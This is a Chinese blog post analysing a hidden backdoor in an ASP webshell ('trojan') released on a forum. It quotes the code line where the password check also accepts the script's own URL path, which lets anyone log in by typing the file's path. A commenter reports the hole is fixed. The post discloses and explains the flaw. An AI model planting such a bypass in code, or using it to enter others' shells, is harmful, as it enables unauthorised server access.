对邪红色内部ASP小木马后门的分析

/ 1评 / 0

在邪红色论坛看到的,标题是《邪红色内部ASP小木马【跨年发布】》

进去看了下介绍,就下载过来研究下,如图是论坛的介绍:

后门地址:

看代码的380行:

If MD5(Request("pwd"))=Userpwd or Request("pwd")=Request.ServerVariables("URL") then Session("mgler")=Userpwd

前面一句没什么问题,就是把用户输入的密码经过MD5加密跟程序设定好的密码进行对比。看后面一句,or Request("pwd")=Request.ServerVariables("URL")   或者用户输入的密码等于Request.ServerVariables("URL")    这个函数的意思是返回服务器当前文件名的url地址。

我们在最前面将这个函数放在asp代码的头部输出一下看看 response.write Request.ServerVariables("URL")

如图,我们得到了这个地址,从上面的语句中我们可以知道只要我们输入的密码等于网站url后面的目录 加上我们的文件名就可以直接进去了,如图我只要输入/ff0000.asp 就能进入了....

 

一条回应:“对邪红色内部ASP小木马后门的分析”

  1. Alien说道:

    😉 感谢提供分析,已经修复:http://www.ff0000.cc/viewthread.php?tid=616

发表评论

电子邮件地址不会被公开。 必填项已用*标注